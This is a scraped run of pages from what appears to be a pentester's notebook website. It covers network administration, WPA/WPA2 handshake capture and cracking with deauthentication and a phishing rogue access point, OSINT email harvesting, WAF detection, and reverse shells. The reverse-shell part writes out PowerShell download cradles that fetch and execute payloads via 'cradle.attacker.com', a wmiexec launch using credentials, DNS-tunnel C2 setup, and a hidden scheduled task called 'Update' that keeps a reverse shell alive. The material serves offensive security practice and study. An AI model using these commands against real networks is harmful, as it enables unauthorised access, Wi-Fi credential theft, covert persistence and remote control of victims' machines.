[https://habr.com/ru/sandbox/18975/](https://habr.com/ru/sandbox/18975/) List rules in all chains (default table is _filter_, there are _mangle_, _nat_ and _raw_ tables beside it): Print rules for all chains (for a specific chains): ### [](https://ppn.snovvcra.sh/admin/networking#fail2ban) fail2ban * `/etc/fail2ban/filter.d` - filters which turn into _user-defined_ fail2ban iptables rules (automatically). Status: Unban: ### [](https://ppn.snovvcra.sh/admin/networking#openvpn) OpenVPN * [https://wiki.calculate-linux.org/openvpn](https://wiki.calculate-linux.org/openvpn) Last updated 1 year ago * [Log Connections](https://ppn.snovvcra.sh/admin/networking#log-connections) * [tcpdump / tshark](https://ppn.snovvcra.sh/admin/networking#tcpdump-tshark) * [iptables](https://ppn.snovvcra.sh/admin/networking#iptables) * [Tools](https://ppn.snovvcra.sh/admin/networking#tools) * [dhclient](https://ppn.snovvcra.sh/admin/networking#dhclient) * [iptables](https://ppn.snovvcra.sh/admin/networking#iptables-1) * [fail2ban](https://ppn.snovvcra.sh/admin/networking#fail2ban) * [OpenVPN](https://ppn.snovvcra.sh/admin/networking#openvpn) Copy $ sudo dhclient -v -r eth0 $ sudo dhclient -v eth0 Copy $ sudo iptables -L -n --line-numbers [-t filter] Copy $ sudo iptables -S [INPUT [1]] Copy $ sudo service fail2ban status $ sudo fail2ban-client status $ sudo fail2ban-client status sshd Copy $ sudo fail2ban-client unban --all $ sudo fail2ban-client set sshd unbanip --- # Personal | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal.md) . [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#id-4-way-handshake) 4-Way Handshake --------------------------------------------------------------------------------------------------- * [https://www.wifi-professionals.com/2019/01/4-way-handshake](https://www.wifi-professionals.com/2019/01/4-way-handshake) * [https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work](https://security.stackexchange.com/questions/66008/how-exactly-does-4-way-handshake-cracking-work) * [https://www.aircrack-ng.org/doku.php?id=cracking\_wpa](https://www.aircrack-ng.org/doku.php?id=cracking_wpa) * [https://security.stackexchange.com/questions/111527/no-handshake-recorded-from-airodump-ng](https://security.stackexchange.com/questions/111527/no-handshake-recorded-from-airodump-ng) * [https://hackware.ru/?p=74](https://hackware.ru/?p=74) * [https://hackware.ru/?p=7542](https://hackware.ru/?p=7542) * [https://hackware.ru/?p=5209](https://hackware.ru/?p=5209) 1\. Look for targets. Save BSSID (`00:00:00:00:00:01`), CH (`9`), ESSID (`SomeEssid`) and STATION (`00:00:00:00:00:02`) if deauth will be required: Copy $ sudo airodump-ng -M -U wlan1 [-c 36-165 (for 5GHz, see WLAN channels) or just -c 1-200 for all] [--band ] qq 2\. Start dumping the target's traffic: Copy [$ sudo iwconfig wlan1 channel 9] $ sudo airodump-ng -c 9 --bssid 00:00:00:00:00:01 -w SomeEssid wlan1 3\. Send DeAuth packets in a separate terminal till `WPA handshake: XX:XX:XX:XX:XX:XX` appears (aggressive): Copy $ sudo aireplay-ng [-D] -0 2 -a 00:00:00:00:00:01 -c 00:00:00:00:00:02 wlan1 Or $ for client in `cat 00:00:00:00:00:01.txt`; do sudo aireplay-ng -D -0 2 -a 00:00:00:00:00:01 -c $client wlan1; done 4\. Clean the capture, check it once again, covert to Hashcat format and crack it: ### [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifite2) wifite2 [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#pmkid) PMKID ---------------------------------------------------------------------------- * [https://https://habr.com/ru/company/jetinfosystems/blog/419383/](https://habr.com/ru/company/jetinfosystems/blog/419383/) ### [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifite2-1) wifite2 [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifite2-2) wifite2 ---------------------------------------------------------------------------------- * [https://github.com/derv82/wifite2](https://github.com/derv82/wifite2) * [https://github.com/nuncan/wifite2mod](https://github.com/nuncan/wifite2mod) > «Поэтому оптимальный алгоритм взло… аудита следующий: определяем, включен ли на целевой точке доступа режим WPS. Если да, запускаем PixieDust. Безуспешно? Тогда перебор известных пинов. Не получилось? Проверяем, не включено ли шифрование WEP, которое тоже обходится влет. Если нет, то выполняем атаку PMKID на WPA(2). Если уж и так не получилось, тогда вспоминаем классику и ждем хендшейка (чтобы не палиться) или активно кикаем клиентов, чтобы наловить их сессии авторизации.» — [\]\[](https://xakep.ru/2020/01/27/wifi-total-pwn/) Install wifite2: Install hcxdumptool (for capturing PMKID hashes): Install (for converting PMKID packet captures into hashcat's format): Fire up wifite2: [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#airgeddon) airgeddon ------------------------------------------------------------------------------------ * [https://github.com/v1s1t0r1sh3r3/airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) [](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifiphisher) wifiphisher ---------------------------------------------------------------------------------------- * [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) * [Creating a custom phishing scenario · wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher/blob/5ae21ab93e0dce85dd4bf76e68cc3b996aa33dea/docs/custom_phishing_scenario.rst) Install: Start a rogue AP with fake captive portal (firmware update scenario) on wlan1 and deauth clients with wlan2: Last updated 2 years ago * [4-Way Handshake](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#id-4-way-handshake) * [wifite2](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifite2) * [PMKID](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#pmkid) * [wifite2](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifite2-1) * [wifite2](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifite2-2) * [airgeddon](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#airgeddon) * [wifiphisher](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal#wifiphisher) Copy $ aircrack-ng SomeEssid*.cap $ wpaclean SomeEssid-cleaned.cap SomeEssid-01.cap $ cowpatty -r SomeEssid-cleaned.cap -s SomeEssid -c $ /usr/lib/hashcat-utils/cap2hccapx.bin SomeEssid-cleaned.cap SomeEssid.hccapx $ hashcat -m 2500 -O -a 0 -w 3 --session=wpa2 -o wpa2.out wpa2.in SomeEssid.hccapx seclists/Passwords/darkc0de.txt Copy $ sudo wifite -vi wlan1 --clients-only --wpa --no-wps Copy $ sudo wifite -vi wlan1 --pmkid Copy $ git clone https://github.com/derv82/wifite2 ~/tools/wifite2 && cd ~/tools/wifite2 $ sudo python setup.py install Copy $ git clone https://github.com/ZerBea/hcxdumptool.git ~/tools/hcxdumptool && cd ~/tools/hcxdumptool $ sudo apt install libcurl4-openssl-dev libssl-dev -y $ make $ sudo make install Copy $ git clone https://github.com/ZerBea/hcxtools.git ~/tools/hcxtools && cd ~/tools/hcxtools $ make $ sudo make install Copy $ sudo wifite -vi wlan1 [--kill] [-5] Copy $ git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git ~/tools/airgeddon && cd ~/tools/airgeddon $ sudo bash airgeddon.sh Copy $ git clone https://github.com/wifiphisher/wifiphisher.git ~/tools/wifiphisher && cd ~/tools/wifiphisher $ sudo python3 setup.py install # Install any dependencies Copy $ sudo wifiphisher -aI wlan1 -eI wlan2 -p wifi_connect --- # OSINT | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/osint.md) . * [https://osintframework.com/](https://osintframework.com/) [](https://ppn.snovvcra.sh/pentest/osint#emails) Emails ------------------------------------------------------------ * [https://hunter.io/](https://hunter.io/) * [https://app.snov.io/domain-search](https://app.snov.io/domain-search) * [https://phonebook.cz/](https://phonebook.cz/) * [https://www.skymem.info/](https://www.skymem.info/) * [https://mailshunt.com/domain-search](https://mailshunt.com/domain-search) * [https://dash.maildb.io/search/domain](https://dash.maildb.io/search/domain) [](https://ppn.snovvcra.sh/pentest/osint#tools) Tools ---------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/osint#theharvester) theHarvester * [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) Copy $ ./theHarvester.py -d megacorp.com -g -s -r -f megacorp.com.xml -b all ### [](https://ppn.snovvcra.sh/pentest/osint#infoga) Infoga * [https://github.com/m4ll0k/Infoga](https://github.com/m4ll0k/Infoga) ### [](https://ppn.snovvcra.sh/pentest/osint#crosslinked) CrossLinked * [https://github.com/m8r0wn/CrossLinked](https://github.com/m8r0wn/CrossLinked) Last updated 3 years ago * [Emails](https://ppn.snovvcra.sh/pentest/osint#emails) * [Tools](https://ppn.snovvcra.sh/pentest/osint#tools) * [theHarvester](https://ppn.snovvcra.sh/pentest/osint#theharvester) * [Infoga](https://ppn.snovvcra.sh/pentest/osint#infoga) * [CrossLinked](https://ppn.snovvcra.sh/pentest/osint#crosslinked) Copy $ ./infoga.py -d megacorp.com -s all -b -r emails.txt -v 2 --- # WAF | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/waf.md) . Enum WAF: Copy $ nmap -sV --script http-waf-detect 127.0.0.1 -p80 $ nmap -sV --script http-waf-fingerprint 127.0.0.1 -p80 + wafw00f.py Last updated 4 years ago --- # Routing | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/networking/routing.md) . [](https://ppn.snovvcra.sh/admin/networking/routing#vm-as-a-router) VM as a Router --------------------------------------------------------------------------------------- * [https://0xdf.gitlab.io/2021/05/04/networking-vms-for-htb.html](https://0xdf.gitlab.io/2021/05/04/networking-vms-for-htb.html) Configure traffic routing and NAT from a Windows host (192.168.0.101, eth0) through a Linux VM (192.168.0.181, eth1 bridged interface) to VPN (10.10.10.0/24, tun0). Enable IP forwarding on Linux VM: Copy $ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward' Create iptables rules to do the forwarding on Linux VM: Copy $ sudo iptables -A FORWARD -i tun0 -o eth1 -m state --state RELATED,ESTABLISHED -j ACCEPT $ sudo iptables -A FORWARD -i eth1 -o tun0 -j ACCEPT For the purpose of redirecting NEW connections from Linux tun0 to Windows host I can set socat on a needed port as a quick solution (actually it's not necessary for this routing task): Copy $ sudo socat TCP-LISTEN:1337,fork TCP:192.168.0.101:1337 Create iptables rules to do NAT on Linux VM: Copy $ sudo iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o tun0 -j MASQUERADE Add a route to Linux VM on Windows host: Copy Cmd > route add 10.10.10.0 mask 255.255.255.0 192.168.0.181 [](https://ppn.snovvcra.sh/admin/networking/routing#openvpn-jump-server) OpenVPN Jump Server ------------------------------------------------------------------------------------------------- I shall configure an intermediate OpenVPN server to serve as a jump box (1st hop) to connect to the target lab. It's helpful when the target OpenVPN server (2nd hop) doesn't allow to have multiple connections with the same common name (`--duplicate-cn` not set), i.e. using the same client's `.ovpn` profile. ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2F1743652255-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MZ5E8Fq0UBQAc7rbfId%252Fuploads%252Fgit-blob-9c22351200e6091b17f257cad0c372f78d0c18bf%252F002.png%3Falt%3Dmedia%26token%3D3c11b08d-1baf-4405-bb36-30562ca33f48&width=768&dpr=3&quality=100&sign=5ee008ac&sv=2) OpenVPN Jump Server Scheme Quick OpenVPN server installation: * [https://www.cyberciti.biz/faq/howto-setup-openvpn-server-on-ubuntu-linux-14-04-or-16-04-lts/](https://www.cyberciti.biz/faq/howto-setup-openvpn-server-on-ubuntu-linux-14-04-or-16-04-lts/) Check OpenVPN server status: Change server config (`/etc/openvpn/server/server.conf`): Create a directory with clients' configs to push and set static IPs for clients: For other clients `/30` subnets [must be used](https://openvpn.net/community-resources/configuring-client-specific-rules-and-access-policies/) as well: Restart OpenVPN server (`tun0`): Start OpenVPN client (`tun1`): Check interfaces: Configure NAT: Make iptables rules persistent: Add the following directive to client's `.ovpn` config to ignore default gateway redirection: Connect to `tun0` as a client (example for the `kali` client) and manually add a route only for traffic you want to go through VPN: Last updated 4 years ago * [VM as a Router](https://ppn.snovvcra.sh/admin/networking/routing#vm-as-a-router) * [OpenVPN Jump Server](https://ppn.snovvcra.sh/admin/networking/routing#openvpn-jump-server) Copy $ sudo apt update $ wget https://git.io/vpn -O openvpn-install.sh $ chmod +x openvpn-install.sh $ sudo bash openvpn-install.sh Copy $ sudo service openvpn-server@server status Copy # Allocate a virtual /30 network topology net30 # Add as many clients as you need route 10.8.1.0 255.255.255.0 route 10.8.2.0 255.255.255.0 # Set a directory to look for clients' configs client-config-dir ccd Copy $ sudo mkdir /etc/openvpn/server/ccd $ sudo sh -c 'echo "ifconfig-push 10.8.1.1 10.8.1.2" > /etc/openvpn/server/ccd/kali' $ sudo sh -c 'echo "ifconfig-push 10.8.1.5 10.8.1.6" > /etc/openvpn/server/ccd/parrot' $ sudo sh -c 'echo "ifconfig-push 10.8.2.1 10.8.2.2" > /etc/openvpn/server/ccd/ubuntu' Copy [1,2] [5,6] [9,10] [13,14] [17,18] [21,22] [25,26] [29,30] [33,34] [37,38] [41,42] [45,46] [49,50] [53,54] [57,58] [61,62] [65,66] [69,70] [73,74] [77,78] [81,82] [85,86] [89,90] [93,94] [97,98] [101,102] [105,106] [109,110] [113,114] [117,118] [121,122] [125,126] [129,130] [133,134] [137,138] [141,142] [145,146] [149,150] [153,154] [157,158] [161,162] [165,166] [169,170] [173,174] [177,178] [181,182] [185,186] [189,190] [193,194] [197,198] [201,202] [205,206] [209,210] [213,214] [217,218] [221,222] [225,226] [229,230] [233,234] [237,238] [241,242] [245,246] [249,250] [253,254] Copy $ sudo service openvpn-server@server restart Copy $ nohup sudo openvpn --client --config lab.ovpn & Copy $ ifconfig tun0 tun0: flags=4305 mtu 1500 inet 10.8.0.1 netmask 255.255.255.255 destination 10.8.0.2 inet6 fe80::ca99:1dec:45c1:5d7a prefixlen 64 scopeid 0x20 inet6 fddd:1194:1194:1194::1 prefixlen 64 scopeid 0x0 unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC) RX packets 5 bytes 420 (420.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 9 bytes 724 (724.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ ifconfig tun1 tun1: flags=4305 mtu 1500 inet 10.10.13.37 netmask 255.255.254.0 destination 10.10.13.37 inet6 dead:beef:2::10ef prefixlen 64 scopeid 0x0 inet6 fe80::bbe3:5b14:117e:4b99 prefixlen 64 scopeid 0x20 unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC) RX packets 5 bytes 420 (420.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 10 bytes 800 (800.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 Copy # Source NAT to reach resources from tun0 to tun1 $ sudo iptables -t nat -A POSTROUTING -s 10.8.0.0/16 -o tun1 -j SNAT --to-source 10.10.13.37 # Destination NAT to trigger reverse shells from tun1 to tun0 (separate port ranges for separate clients, red arrow on the diagram above) $ sudo iptables -t nat -A PREROUTING -i tun1 -p tcp --dport 6001:7000 -j DNAT --to-destination 10.8.1.1 $ sudo iptables -t nat -A PREROUTING -i tun1 -p tcp --dport 7001:8000 -j DNAT --to-destination 10.8.1.5 $ sudo iptables -t nat -A PREROUTING -i tun1 -p tcp --dport 8001:9000 -j DNAT --to-destination 10.8.2.1 Copy $ sudo apt install iptables-persistent -y $ sudo service netfilter-persistent save Copy pull-filter ignore "redirect-gateway" Copy $ sudo openvpn kali.ovpn $ sudo ip route add 10.10.10.0/24 via 10.8.1.2 metric 0 dev tun0 --- # Quick Configurations | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/networking/quick-configurations.md) . [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#static-config) Static Config -------------------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#manually) Manually Copy $ sudo service NetworkManager stop $ ifconfig $ sudo ifconfig eth0 10.10.13.37 netmask 255.255.255.0 $ sudo route add default gw 10.10.13.1 dev eth0 $ route -n $ sudo vi /etc/resolv.conf domain megacorp.local search megacorp.local nameserver 192.168.0.1 $ ping 8.8.8.8 $ nslookup ya.ru $ sudo systemctl enable ssh --now ### [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#netplan) netplan `/etc/netplan/*.yaml`: Copy network: version: 2 renderer: networkd ethernets: eth0: addresses: [10.10.13.37/24] gateway4: 10.10.13.1 dhcp4: true optional: true nameservers: addresses: [8.8.8.8,8.8.4.4] Apply: ### [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#disable-ipv6) Disable IPv6 Wired: Wireless: [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#resolvconf) resolvconf -------------------------------------------------------------------------------------------- * [https://unix.stackexchange.com/questions/128220/how-do-i-set-my-dns-when-resolv-conf-is-being-overwritten](https://unix.stackexchange.com/questions/128220/how-do-i-set-my-dns-when-resolv-conf-is-being-overwritten) [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#simultaneous-interfaces) Simultaneous Interfaces ---------------------------------------------------------------------------------------------------------------------- Configure multiple interfaces to work simultaneously: [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#inner-and-outer-traffic) Inner and Outer Traffic ---------------------------------------------------------------------------------------------------------------------- Route inner traffic to eth0 (lan), Internet to wlan0 (wan): [](https://ppn.snovvcra.sh/admin/networking/quick-configurations#wrap-all-traffic-into-vpn-in-windows) Wrap All Traffic into VPN in Windows ------------------------------------------------------------------------------------------------------------------------------------------------ Check the name of VPN interface (`Virtual Ethernet Adapter`): Checks its id (`16`, it's shown in decimal): Add a static route to wrap all traffic into the VPN gateway. To achieve that specify VPN interface id in hexadecimal (`0x10` in this example) and set higher priority for this route (i.e., lower metric) than default gateway route has: To delete the route run: Last updated 4 months ago * [Static Config](https://ppn.snovvcra.sh/admin/networking/quick-configurations#static-config) * [Manually](https://ppn.snovvcra.sh/admin/networking/quick-configurations#manually) * [netplan](https://ppn.snovvcra.sh/admin/networking/quick-configurations#netplan) * [Disable IPv6](https://ppn.snovvcra.sh/admin/networking/quick-configurations#disable-ipv6) * [resolvconf](https://ppn.snovvcra.sh/admin/networking/quick-configurations#resolvconf) * [Simultaneous Interfaces](https://ppn.snovvcra.sh/admin/networking/quick-configurations#simultaneous-interfaces) * [Inner and Outer Traffic](https://ppn.snovvcra.sh/admin/networking/quick-configurations#inner-and-outer-traffic) * [Wrap All Traffic into VPN in Windows](https://ppn.snovvcra.sh/admin/networking/quick-configurations#wrap-all-traffic-into-vpn-in-windows) Copy $ sudo service NetworkManager stop $ sudo netplan apply Copy $ sudo vi /etc/sysctl.conf net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 $ sudo sudo sysctl -p Copy $ nmcli connection show $ nmcli connection modify "" ipv6.method ignore $ nmcli connection up "" Copy $ sudo apt install resolvconf $ sudo vi /etc/resolvconf/resolv.conf.d/base $ sudo resolvconf -u Copy $ cat /etc/network/interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). source /etc/network/interfaces.d/* # NAT allow-hotplug eth0 iface eth0 inet dhcp # Internal allow-hotplug eth1 iface eth1 inet dhcp # Host-only allow-hotplug eth2 iface eth2 inet dhcp # The loopback network interface auto lo iface lo inet loopback Copy $ ifup eth0 $ ifup eth1 $ ifup eth2 Copy $ route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.0.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 172.20.10.1 0.0.0.0 UG 600 0 0 wlan0 172.20.10.0 0.0.0.0 255.255.255.240 U 600 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 $ sudo ip route add 192.168.0.0/16 via 192.168.0.1 metric 100 dev eth0 $ sudo ip route add 172.16.0.0/12 via 192.168.0.1 metric 100 dev eth0 $ sudo ip route add 10.0.0.0/8 via 192.168.0.1 metric 100 dev eth0 $ sudo ip route del 0.0.0.0/0 via 192.168.0.1 dev eth0 $ route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 172.20.10.1 0.0.0.0 UG 600 0 0 wlan0 10.0.0.0 192.168.0.1 255.0.0.0 UG 100 0 0 eth0 172.16.0.0 192.168.0.1 255.240.0.0 UG 100 0 0 eth0 172.20.10.0 0.0.0.0 255.255.255.240 U 600 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.0.0 192.168.0.1 255.255.0.0 UG 100 0 0 eth0 $ sudo chattr -i /etc/resolv.conf $ sudo vi /etc/resolv.conf ...change dns resolve order if necessary... Copy Cmd > ipconfig /all Адаптер Ethernet Ethernet 2: DNS-суффикс подключения . . . . . : Описание. . . . . . . . . . . . . : Virtual Ethernet Adapter ... IPv4-адрес. . . . . . . . . . . . : 192.168.100.181(Основной) Copy Cmd > route print -4 =========================================================================== Список интерфейсов 16...00 ff 00 ff 00 ff ......Virtual Ethernet Adapter Copy Cmd > route add 0.0.0.0 mask 0.0.0.0 192.168.100.1 metric 7 if 0x10 Cmd > route print -4 ... IPv4 таблица маршрута =========================================================================== Активные маршруты: Сетевой адрес Маска сети Адрес шлюза Интерфейс Метрика 0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.101 25 0.0.0.0 0.0.0.0 192.168.100.1 192.168.100.181 7 Copy Cmd > route add 0.0.0.0 mask 0.0.0.0 192.168.100.1 --- # 2FA Bypass | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/2fa-bypass.md) . * [\[XMind\] 2FA Bypass Techniques Mindmap](https://www.xmind.net/m/8Hkymg/#) Last updated 4 years ago --- # Reverse Shells | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/shells/reverse-shells.md) . * [https://securixy.kz/hack-faq/reverse-shell-ili-bjekkonnekt.html/](https://securixy.kz/hack-faq/reverse-shell-ili-bjekkonnekt.html/) * [https://gist.github.com/daniruiz/c073f631d514bf38e516b62c48366efb](https://gist.github.com/daniruiz/c073f631d514bf38e516b62c48366efb) [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#powershell) PowerShell ------------------------------------------------------------------------------------ * [https://github.com/besimorhino/powercat](https://github.com/besimorhino/powercat) * [https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11](https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11) * [https://github.com/tihanyin/PSSW100AVB/blob/main/ReverseShell\_2022\_03.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/ReverseShell_2022_03.ps1) ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#download-cradles) Download Cradles * [https://gist.github.com/HarmJ0y/bb48307ffa663256e239](https://gist.github.com/HarmJ0y/bb48307ffa663256e239) * [https://github.com/danielbohannon/Invoke-CradleCrafter](https://github.com/danielbohannon/Invoke-CradleCrafter) * [https://github.com/VirtualAlllocEx/Payload-Download-Cradles](https://github.com/VirtualAlllocEx/Payload-Download-Cradles) ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#powershell-dns-delivery) PowerShell DNS Delivery * [https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/](https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/) * [https://github.com/mdsecactivebreach/PowerDNS](https://github.com/mdsecactivebreach/PowerDNS) Copy 'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]' wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt' [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#transport-over-dns) Transport over DNS ---------------------------------------------------------------------------------------------------- * [https://xakep.ru/2018/09/07/dns-tunneling/](https://xakep.ru/2018/09/07/dns-tunneling/) * [https://habr.com/ru/post/345056/](https://habr.com/ru/post/345056/) * [https://habr.com/ru/company/group-ib/blog/496712/](https://habr.com/ru/company/group-ib/blog/496712/) ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#dnscat2) dnscat2 * [https://github.com/iagox86/dnscat2](https://github.com/iagox86/dnscat2) * [https://github.com/lukebaggett/dnscat2-powershell](https://github.com/lukebaggett/dnscat2-powershell) ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#chashell) chashell * [https://github.com/sysdream/chashell](https://github.com/sysdream/chashell) Buy and configure DNS (e. g., `example.com`): Get dependencies: Clone chashell into `$GOPATH/src` (otherwise, `dep` will error out): Build binaries: Run server on Attacker: Run client on Victim: [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#tools) Tools -------------------------------------------------------------------------- * [https://www.revshells.com/](https://www.revshells.com/) * [https://itm4n.github.io/tools/](https://itm4n.github.io/tools/) ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#vbrev) VbRev * [https://github.com/VbScrub/VbRev](https://github.com/VbScrub/VbRev) ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#xc) xc * [https://github.com/xct/xc](https://github.com/xct/xc) Listen: Launch: ### [](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#cliws) cliws * [https://github.com/b23r0/cliws](https://github.com/b23r0/cliws) Reverse mode: Create a scheduled task for persistence: Last updated 8 months ago * [PowerShell](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#powershell) * [Download Cradles](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#download-cradles) * [PowerShell DNS Delivery](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#powershell-dns-delivery) * [Transport over DNS](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#transport-over-dns) * [dnscat2](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#dnscat2) * [chashell](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#chashell) * [Tools](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#tools) * [VbRev](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#vbrev) * [xc](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#xc) * [cliws](https://ppn.snovvcra.sh/pentest/shells/reverse-shells#cliws) Copy A * -> A @ -> A chashell -> NS c -> chashell.example.com Copy $ export GOPATH=/home/user/code/go $ export PATH=$GOPATH:$GOPATH/bin:$PATH $ go get -v -u github.com/golang/dep/cmd/dep $ go get github.com/mitchellh/gox $ cd $GOPATH/src/github.com/golang/dep $ go install ./... Copy $ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell $ cd $GOPATH/src/chashell Copy $ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))') $ export DOMAIN_NAME=c.example.com $ make build-all OSARCH="linux/amd64" Copy $ cd release/ $ sudo systemctl stop systemd-resolved $ sudo ./chaserv_linux_amd64 Copy $ ./chashell_linux_amd64 Copy $ rlwrap ./xc -l -p 443 Copy PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443" Copy $ rlwrap -cAr ./cliws -l 8000 Cmd > .\cliws.exe -r ws://10.10.13.37:8000 powershell Copy $ while true; do sudo netstat -tulpan | grep LISTEN | grep 8080 > /dev/null || rlwrap -cAr ./cliws -l 8080; done $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1) $settings = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Queue $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell" Register-ScheduledTask -TaskName "Update" -Trigger $trigger -Settings $settings -Action $action --- # Infrastructure | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/infrastructure.md) . * [https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d](https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d) * [https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4](https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4) * [https://rastamouse.me/sharpc2-https-with-redirector/](https://rastamouse.me/sharpc2-https-with-redirector/) * 